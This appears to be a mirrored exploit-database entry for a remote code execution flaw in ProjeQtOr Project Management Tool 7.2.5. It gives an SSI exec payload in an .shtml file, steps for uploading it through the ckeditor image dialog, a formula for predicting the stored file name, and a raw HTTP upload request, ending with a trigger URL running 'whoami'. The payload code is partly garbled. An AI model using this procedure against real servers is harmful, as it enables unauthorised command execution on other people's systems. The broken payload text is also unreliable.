ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1368170 漏洞类型
发布时间 2018-10-25 更新时间 2018-10-25
漏洞平台 PHP CVSS评分 N/A
# Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution
# Date: 2018-10-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact:
# Vendor Homepage:
# Software Link:
# Version: v7.2.5
# Category: Webapps
# Tested on: XAMPP for Linux 7.2.8-0
# Description : ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary "shtml" files which
# leads to a remote command execution on the remote server.

# 1) Create a file with the below HTML code and save it as .shtml

function fex()
document.location.href="<!--#echo var=DOCUMENT_NAME
<!--#exec cmd=$output -->

# 2) Login to ProjeQtOr portal as priviliage user
# 3) You can perform this operation in the ckeditor fields.
# 4) Click (Image) button on Content panel.
# 5) Chose Upload section and browse your .shtml file.
# 6) Click "Send it to Server". Script will give you "This file is not a valid image." error.
# But it will send the file to the server. Just we need to find the file.
# 7) We can read how the uploaded files are named in the
# "/tool/uploadImage.php" file.(line 90)


# 8) The name of our file should be;

Y = Years, numeric, at least 2 digits with leading 0
m = Months, numeric
d = Days, numeric
H = Hours, numeric, at least 2 digits with leading 0
i = Minutes, numeric
s = Seconds, numeric

# We must save the date and time of the upload moment.

Formula : Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name

# For Example; If you uploaded a file called "RCE.shtml" on 2018.10.23 at 01:02:30
# the file name will be "20181023010230_1_RCE.shtml"

# 9) Finaly all uploaded images are sent under the "/files/images/" folder.
# 10) Verift the exploit: http://domain/files/images/20181023010230_1_RCE.shtml?whoami

The request:

Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/view/main.php
Cookie: projeqtor=cd3d5cf676e8598e742925cfd2343696;
Connection: keep-alive
Content-Type: multipart/form-data;
Content-Length: 550
Content-Disposition: form-data; name="upload"; filename="RCE.shtml"
Content-Type: text/html

[shtml file content]
Content-Disposition: form-data; name="ckCsrfToken"


HTTP/1.1 200 OK
Date: Mon, 23 Oct 2018 01:02:30 GMT